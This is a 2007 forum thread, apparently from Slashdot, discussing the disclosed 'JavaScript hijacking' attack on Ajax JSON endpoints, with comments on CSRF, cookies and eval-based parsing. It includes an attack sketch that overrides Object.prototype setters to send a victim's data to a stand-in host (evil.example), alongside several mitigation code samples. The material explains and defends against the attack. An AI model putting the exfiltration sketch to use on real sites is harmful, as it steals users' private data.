Web 2.0 Under Siege

Robert writes "Security researchers have found what they say is an entirely new kind of web-based attack, and it only targets the Ajax applications so beloved of the 'Web 2.0' movement. Fortify Software, which said it discovered the new class of vulnerability and has named it 'JavaScript hijacking', said that almost all the major Ajax toolkits have been found vulnerable. 'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'"
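
The technique is easiest to see in a concrete sketch. The endpoint, domains, and field names below are hypothetical, and the attack depended on a browser quirk of the era (since fixed) in which evaluating an object literal invoked setters inherited from Object.prototype:

    <!-- attacker.html: a page the victim visits while still logged in
         to the vulnerable Ajax application elsewhere. -->
    <script>
    // Plant a setter so that every "email" property assigned while the
    // JSON below evaluates is reported to the attacker.
    Object.prototype.__defineSetter__("email", function (value) {
      new Image().src = "http://evil.example/steal?d=" + encodeURIComponent(value);
    });
    </script>
    <!-- The browser attaches the victim's session cookie to this request,
         so the response it evaluates is the victim's private data. -->
    <script src="http://victim.example/contacts.json"></script>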
  • XSS (Score:2, Interesting)

    by Anonymous Coward on Monday April 02, 2007 @11:25AM (#18574321)
    So, how is this different from JavaScript injection or cross-site scripting?
  • XSRF (Score:2, Interesting)

    by Anonymous Coward on Monday April 02, 2007 @11:30AM (#18574391)
    How is this different from cross-site request forgery?

    http://en.wikipedia.org/wiki/Cross-site_request_forgery [wikipedia.org]
  • Re:XSS (Score:1, Interesting)

    by Anonymous Coward on Monday April 02, 2007 @11:36AM (#18574507)
    Regarding regular XSS...

    XSS/JS injection is more about injecting alien JavaScript into site A ...

    OK so far.

    ... to make site A call site B with the info it wants.

    Darn, I thought it was to make site A execute code and retrieve info from the user's system, not from another site :(

    Would you care to elaborate a bit?

  • Where's the problem? (Score:5, Interesting)

    by pimterry ( 970628 ) on Monday April 02, 2007 @11:39AM (#18574557)
    "In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

    So essentially it means the attacker can reuse the user's authentication cookie to authenticate as them, and then run JavaScript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (user session IDs, etc.), store it in a variable within the JavaScript. That will stay there until a page refresh clears the variables, and how many page refreshes occur with AJAX?

    AJAX apps do not need to (and should not!) store user authentication in cookies. Cookies are useful for keeping a continual session open between pages; AJAX needs no continual session. If they don't use cookies, then other sites cannot use that authentication. (A sketch of this approach follows this comment.)

    Where's the problem? (What am I missing?)

    PimTerry
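
    A minimal sketch of the approach described above, with hypothetical names: the token lives in a script variable rather than a cookie, so a page on another origin has no ambient credential to ride on.

        // Set once from the response to an explicit login call.
        var sessionToken = null;

        function apiRequest(url, callback) {
          var xhr = new XMLHttpRequest();
          xhr.open("GET", url, true);
          // The server checks this header instead of a cookie; a request
          // forged from another site cannot read the variable to supply it.
          xhr.setRequestHeader("X-Session-Token", sessionToken);
          xhr.onreadystatechange = function () {
            if (xhr.readyState === 4 && xhr.status === 200) {
              callback(xhr.responseText);
            }
          };
          xhr.send(null);
        }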
  • Shirky's Law: (Score:5, Interesting)

    by sakusha ( 441986 ) on Monday April 02, 2007 @11:43AM (#18574613)
    "Social Software is stuff that gets spammed."

    The obvious implication of Shirky's Law is that Web 2.0 services are an attractive nuisance and give spammers and other griefers an incentive to game the system. Any new web service has to account for this and build in extremely high levels of security. Obviously nobody is doing this.
  • by slashkitty ( 21637 ) on Monday April 02, 2007 @11:47AM (#18574661) Homepage
    It was reported as a problem with the Google address book. These guys just generalized the problem because they saw it in many places.

    It actually could be pretty nasty. I think the only solution is to pass authentication tokens through the URL or input parameters (not through cookies); a variant of this is sketched after this comment.

    It might be a good time to use the Firefox NoScript plugin if you're not using it already. Only allow JavaScript on sites you trust.
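
    The URL-parameter variant of the same idea, reusing the hypothetical apiRequest sketch above. (One caveat: tokens in URLs can leak through server logs and Referer headers, so a header or POST parameter is usually the safer carrier.)

        // The token is supplied explicitly on each call rather than
        // riding along automatically the way a cookie would.
        apiRequest("/contacts.json?token=" + encodeURIComponent(sessionToken),
                   function (text) {
                     // handle the response
                   });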

  • by unity100 ( 970058 ) on Monday April 02, 2007 @12:44PM (#18575467) Homepage Journal
    If you delegate operations and processes to the client side, sooner or later attackers will find enough ways to exploit them that offering such client-side functionality becomes a security risk in itself. That will make anti-virus, anti-spyware, and privacy product manufacturers more agitated about it, and in the end it will drive visitors away from your site through blocks, issues, and fear.
  • by consumer ( 9588 ) on Monday April 02, 2007 @01:03PM (#18575775)
    Checking the Referer header is ultimately going to fail because it would mean trusting the client not to lie about it. There are some better techniques described in the Wikipedia XSRF entry; one is sketched below.
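
    One of those techniques, sketched with hypothetical names: the server embeds a per-session secret in the markup of its own pages. A script on another origin cannot read that markup, so forged requests arrive without the secret and can be rejected.

        <!-- Emitted by the server into its own page: -->
        <meta id="csrf-token" content="(per-session secret)">

        <script>
        var csrfToken = document.getElementById("csrf-token")
                                .getAttribute("content");

        function postWithToken(url, body, callback) {
          var xhr = new XMLHttpRequest();
          xhr.open("POST", url, true);
          // The attacker's page cannot read this value, so the server
          // can safely reject any request that omits or mismatches it.
          xhr.setRequestHeader("X-CSRF-Token", csrfToken);
          xhr.onreadystatechange = function () {
            if (xhr.readyState === 4) { callback(xhr); }
          };
          xhr.send(body);
        }
        </script>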
  • Re:sigh (Score:4, Interesting)

    by julesh ( 229690 ) on Monday April 02, 2007 @01:51PM (#18576547)
    This just sounds like a fancy Cross-Site Request Forgery.

    That'll be because it is. It's basically an observation that CSRF on a site which returns data in JSON format allows the attacker to read the content of the result. Well, duh. Of course that happens. It's one of the reasons I've always opposed JSON as a useful format.

    The other reason is equally bad, but only applies to "mash up" type situations: the coder of the client has to trust the server with access to all data in the client. This makes it useless in many situations.

    The best solution would be to scrap the current security system, make subrequest cookies (including XMLHttpRequests) dependent on both the domain the request goes to *and* the domain of the page that caused the request, and allow XMLHttpRequest to access servers other than the page source. This would both fix CSRF and eliminate the need for JSON. What more do you want? :)
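
    Short of changing the browsers, there is also a server-side mitigation some sites already used at the time: prefix every JSON response with an unexecutable guard such as "while(1);". A <script> tag that includes the URL loops or throws before any data evaluates, while the legitimate client, which fetched the text via XMLHttpRequest, simply strips the prefix. A sketch of the client side (JSON.parse is native only in later browsers; json2.js provides it otherwise):

        function parseGuardedJson(text) {
          var guard = "while(1);";
          // The guard makes the response useless as a <script> include.
          if (text.indexOf(guard) === 0) {
            text = text.slice(guard.length);
          }
          // Parse as data, not code; never feed the text to eval.
          return JSON.parse(text);
        }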
  • by julesh ( 229690 ) on Monday April 02, 2007 @02:08PM (#18576797)
    There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval". Now that was dumb.

    You don't say. My first thought on hearing about the entire idea was "why would you want to let a foreign server run its code on your page?"

    The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable.

    Err... if I don't let foreign code execute (i.e., if I avoid doing things like 'var e = document.createElement("script"); e.src = "http://www.someotherserver.com/potential-security-risk"; document.body.appendChild(e);', which I've seen many scripts do), how can another site redefine the objects in my script? I think the vulnerability is that most JS programmers are too willing to let other sites execute arbitrary code in their own context, which really ain't good.

    The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

    The fix seems obvious to me:

    * cookies in subrequests must be tied to the domain of the page that initiated the request as well as the domain the request goes to; this reduces the possibility of CSRF. So if www.a.com has a web page that requests data from www.b.com, it will only send a cookie if www.b.com set one in response to a previous request from www.a.com. This applies to SCRIPT tags, to IFRAME tags, to IMG tags, to LINK tags, etc.

    * XMLHttpRequest must not be tied to the same-domain policy. Attempts to access a different domain should result in a request for confirmation from the user the first time any particular requester/receiver domain pair is used. This means mashups (and other applications that need cross-domain access) can be written that do not need to use JSON. JSON parsing through script insertion or eval() is insecure, and should be deprecated.

    As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

    Scripts, yes. I don't see the need to ensure that data originates in the same domain.
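
    A small illustration of why the eval-based parsing criticized above is dangerous, with a hypothetical hostile response: eval executes whatever arrives, while a strict parser rejects anything that is not pure data.

        var hostile = '[{"name": "x"}]; alert(document.cookie)';

        // eval(hostile);    // would run the alert: the "data" is also code

        try {
          JSON.parse(hostile);   // a strict parser throws SyntaxError instead
        } catch (e) {
          // reject the malformed (or hostile) input
        }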
